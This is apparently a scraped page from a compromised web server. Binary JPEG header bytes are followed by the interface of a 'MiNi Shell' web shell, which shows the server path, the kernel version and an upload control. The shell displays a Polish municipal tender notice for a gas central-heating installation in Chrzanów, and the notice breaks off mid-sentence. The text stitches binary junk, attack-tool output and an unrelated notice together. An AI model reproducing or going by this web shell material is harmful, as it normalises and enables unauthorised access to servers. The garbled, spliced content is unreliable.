JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240722/0042400901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa instalacji c.o. w oparciu o kocioł gazowy w budynku przy ul. Berka Joselewicza 1 w Chrzanowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI ZARZĄD ZASOBÓW KOMUNALNYCH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 120288979</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Garncarska 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chrzanów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mzzk@chrzanow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://mzzk.chrzanow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa instalacji c.o. w oparciu o kocioł gazowy w budynku przy ul. Berka Joselewicza 1 w Chrzanowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fce3145b-550a-4aa6-a26f-8987fbebb332</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00424009</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00045092/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa instalacji c.o. w oparciu o kocioł gazowy w budynku przy ul. Berka Joselewicza 1 w Chrzanowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-fce3145b-550a-4aa6-a26f-8987fbebb332 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy e-Zamówienia (https://ezamowienia.gov.pl/pl) oraz poczty elektronicznej.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. <br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust 3 ustawy, przedmiotowe środki dowodowe składa się za pośrednictwem portalu e-Zamówienia.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu, z wyłączeniem składania ofert w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. <br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). <br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. <br/> W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od Wykonawcy (Dz. U. z 2020 poz. 2415).<br/>Wykonawca może zwrócić się do zamawiającego o wyjaśnienie treści specyfikacji warunków zamówienia. <br/>Zamawiający jest obowiązany niezwłocznie udzielić wyjaśnień, zgodnie z Art. 284. ust.2 jednak nie później niż na 2 dni przed upływem terminu składania odpowiednio ofert, pod warunkiem ,że wniosek o wyjaśnienie treści SWZ wpłynął do zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert. Oferta musi być sporządzona w języku polskim, w formie elektronicznej opatrzonej kwalifikowanym podpisem lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym pod rygorem nieważności.Wykonawca może złożyć tylko jedną ofertę.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Przysługują Pani/Panu następujące prawa wobec Administratora:<br/>a)	prawo dostępu do własnych danych osobowych. Może Pani/Pan uzyskać informacje, czy Administrator przetwarza Pani/Pana dane osobowe. Ma Pani/Pan także prawo do uzyskania dostępu do własnych danych osobowych, kopii tych danych, a także informacji o celach przetwarzania Pani/Pana danych osobowych, informacji o kategorii przetwarzanych danych osobowych, informacji o odbiorcach lub kategoriach odbiorców, którym Administrator udostępnił Pani/Pana dane osobowe, o planowanym okresie przechowywania Pani/Pana danych osobowych, o Pani/Pana prawach zwią-zanych z przetwarzaniem danych, w tym prawie do wniesienia skargi do organu nadzorczego, źródle danych i o zautomatyzowanym podejmowaniu decyzji (o ile ma miejsce);<br/>b)	prawo do sprostowania danych osobowych. Może Pani/Pan żądać, aby Administrator niezwłocznie sprostował Pani/Pana dane osobowe, które są nieprawidłowe. Może Pani/Pan również żądać, aby Administrator uzupełnił niekompletne dane, ale tylko w zakresie, w jakim przetwarzanie tych danych jest niezbędne do osiągnięcia ce-lu ich przetwarzania;<br/>c)	prawo do usunięcia danych osobowych (prawo do bycia zapomnianym). Prawo to przysługuje Pani/Panu, o ile zostanie spełniony jeden z poniższych warunków:<br/>•	Pani/Pana dane osobowe nie są już niezbędne do celów, w których zostały zebrane lub w inny sposób są przetwarzane;<br/>•	przetwarzanie Pani/Pana danych osobowych odbywa się na zgodzie, którą Pa-ni/Pan cofnie, i nie ma innej podstawy prawnej przetwarzania;<br/>•	wniesie Pani/Pan sprzeciw wobec przetwarzania danych osobowych, a Administrator nie będzie miał nadrzędnych prawnie uzasadnionych podstawy do dalszego ich przetwarzania;<br/>•	Administrator przetwarzał Pani/Pana dane osobowe niezgodnie z prawem;<br/>•	Pani/Pana dane osobowe muszą zostać usunięte w celu wywiązania się przez Administratora z obowiązku prawnego;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">d)	prawo do ograniczenia przetwarzania danych osobowych. Prawo to przysługuje Pani/Panu, o ile zostanie spełniony jeden z poniższych warunków:<br/>•	jeżeli kwestionuje Pani/Pan prawidłowość danych osobowych – na okres pozwala-jący Administratorowi sprawdzić prawidłowość tych danych;<br/>•	jeżeli przetwarzanie przez Administratora Pani/Pana danych jest niezgodne z prawem, a Pani/Pan sprzeciwi się usunięciu swoich danych osobo-wych, żądając ograniczenia ich wykorzystywania;<br/>•	Administrator nie potrzebuje już danych osobowych do celów przetwarzania, ale będą one potrzebne Pani/Panu do ustalenia, dochodzenia lub obrony roszczeń;<br/>•	wniesie Pani/Pan sprzeciw wobec przetwarzania – do czasu stwierdzenia, czy prawnie uzasadnione podstawy po stronie Administratora są nadrzędne wobec podstaw założonego przez Panią/Pana sprzeciwu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/2/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Obecnie w budynku zlokalizowanych jest 4 lokale mieszkalne o łącznej pow. użytkowej 218,30 m2. Budynek wyposażony jest w instalację: wodną, kanalizacyjną i elektryczną. Ogrzewanie pomieszczeń odbywa się poprzez indywidualne źródła ciepła - piece węglowe pokojowe i kuchenne oraz elektrycznie; podgrzewanie c.w.u. odbywa się poprzez elektryczne podgrzewacze pojemnościowe.<br/>Zakres prac obejmuje:<br/>1.Zmianę sposobu użytkowania pomieszczenia piwnicznego na pomieszczenie kotłowni ga-zowej wraz z niezbędnymi elementami związanymi z budową i eksploatacją kotłowni. Prace budowlane związane z realizacją zadania.<br/>a)	Pogłębienie nowo powstałego pomieszczenia kotłowni gazowej oraz wykonanie nowej posadzki.<br/>b)	Wykonanie nowej posadzki wraz z okładziną płytkami i cokołami z płytek.<br/>c)	Rozbiórka ścian piwnic oraz wykonanie nowych ścian wydzielających nowopowstałe pomieszczenia kotłowni gazowej.<br/>d)	Wykonanie stopni po obniżeniu poziomu posadzki w projektowanym pomieszczeniu kotłowni.<br/>e)	Tynkowanie ścian i sufitów wewnątrz pomieszczenia kotłowni wraz z późniejszym ich malowaniem. Ułożenie płytek ściennych w obrębie zlewu technicznego.<br/>f)	Wykonanie pasów niepalnych na zewnętrznej powierzchni ścian pomieszczenia ko-tłowni gazowej.<br/>g)	Montaż ognioodpornych drzwi wejściowych do pomieszczenia kotłowni.<br/>h)	Budowa instalacji wodnej i kanalizacyjnej wraz ze studnią schładzającą z pompą zanu-rzeniową oraz zlewem technicznym.<br/>i)	Montaż nowej instalacji elektrycznej na potrzeby kotłowni gazowej.<br/>j)	Wykonanie wentylacji grawitacyjnej z podłączeniem do istniejącego przewodu komi-nowego z jego wyszlamowaniem.<br/>k)	Budowa szafki licznikowej wraz z linią zasilającą dla pomieszczenia kotłowni. Wyko-nanie instalacji odbiorczej w pomieszczeniu kotłowni.<br/>l)	Wymiana okienka zgodnego z wymaganiami w pomieszczeniu kotłowni.<br/>m)	Wykonanie ocieplenia stropu piwnicznego metodą natryskiwania wełny oraz ocieple-nia stropu wełną twardą nad pierwszym piętrem wraz z wykonaniem na nim posadzki jastrychowej. <br/>2.Budowę instalacji centralnego ogrzewania gazowego i przebudowę instalacji elektrycznej. Prace budowlane związane z realizacją zadania.<br/>a)	Wykonanie instalacji gazowej z rur stalowych spawanych dla zasilania kotłowni ga-zowej.<br/>b)	Zabudowa lekka z płyt GK pionów i gałązek nowo instalowanych rurociągów c.o.<br/>c)	Demontaż pokojowych pieców węglowych oraz kuchennych pieców węglowych wraz z zamurowaniem podpięć, wyciorów i zadekowaniem nieczynnych przewodów kominowych ponad dachem.<br/>d)	Wykonanie instalacji grzewczej wraz z pionami c.o. <br/>e)	Wykonanie instalacji wodnej z opomiarowaniem oraz kanalizacyjnej w pomieszcze-niu nowopowstałej kotłowni, <br/>f)	Montaż grzejnikowego systemu ogrzewania pomieszczeń mieszkalnych prowadzo-nych po ścianach pomieszczeń w systemie rur miedzianych łączonych metoda lu-towania.<br/>g)	Montaż na grzejnikach indywidualnych podzielników ciepła ze zdalnym odczytem firmy TECHEM.<br/>h)	Wykonanie wentylacji nowopowstałej kotłowni gazowej poprzez udrożnienie i szlamowanie istniejących przewodów kominowych.<br/>i)	Instalacja przewodu powietrzno-spalinowego kotła gazowego poprzez udrożnienie i ewentualne frezowanie istniejącego przewodu kominowego.<br/>j)	Remont kominów ponad dachem.<br/>k)	Wykonanie robót budowlanych po pracach instalacyjnych i rozbiórkowych wewnątrz lokali mieszkalnych i na klatce schodowej.<br/>l)	Rozbudowa rozdzielnic o dodatkowy obwód elektryczny dla pomieszczenia nowo-powstałej kotłowni gazowej.<br/>m)	Wyposażenie mieszkań w kuchenki elektryczne czteropłytkowe z piekarnikiem.<br/>n)	Ułożenie linii zasilających oraz przebudowa instalacji elektrycznej wewnątrz miesz-kań.<br/>o)	Rozbudowa rozdzielnic mieszkaniowych o dodatkowe obwody elektryczne oraz uło-żenie linii zasilających 3 fazowych dla nowo montowanych kuchni elektrycznych.<br/>p)	Rozbudowa zabezpieczeń przed licznikowych zgodnie z wydanymi warunkami zwiększenia mocy na mieszkania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45211000-9 - Roboty budowlane w zakresie budownictwa wielorodzinnego i domów jednorodzinnych</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu, określone przez Zamawiającego:<br/>Zdolności do występowania w obrocie krajowym - Zamawiający nie stawia w ww. zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny;<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że posiadają uprawnienia do określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów-<br/> Zamawiający nie stawia w ww. zakresie żadnych wymagań; których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny;<br/>Warunek ekonomiczny – <br/>Wykonawca spełni warunek, jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości nie mniejszej niż 300 000,00 zł (słownie: trzysta tysięcy złotych).<br/>Warunek zdolności technicznej lub zawodowej.<br/> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że: <br/>a)	posiadają niezbędną wiedzę i doświadczenie tzn. w okresie ostatnich 5 lat przed upływem terminu składania ofert o udzielenie zamówienia , a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał min. dwa zamówienia o wartości nie mniejszej niż 300 000,00 zł brutto każda, polegające na wykonaniu lub wymianie instalacji wewnętrznej centralnego ogrzewania w budynku, <br/>oraz dysponuje <br/>b)	min. jedną osobą posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie o specjalności konstrukcyjno-budowlanej bez ograniczeń – kierownik budowy<br/>c)	min. jedną osoba posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych ,<br/>oraz dysponuje<br/>d)	min. jedną osobą posiadające uprawnienia budowlane do wykonywania samodzielnej funkcji w budownictwie o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>Zamawiający dopuszcza możliwość posiadania uprawnień gwarantujących spełnienie warunków zdolności zawodowej przez jedną osobę. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">-Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacenie podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenie dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należytych podatków lub opłat wraz z odsetkami lub grzywnami luz zawarł wiążące porozumienie w sprawie spłat tych należności.<br/>-Zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających , że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.<br/>-oświadczenie Wykonawcy, w zakresie wskazanym w art. 108 ust. 1 pkt 5 Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę w postępowaniu, albo oświadczenie o 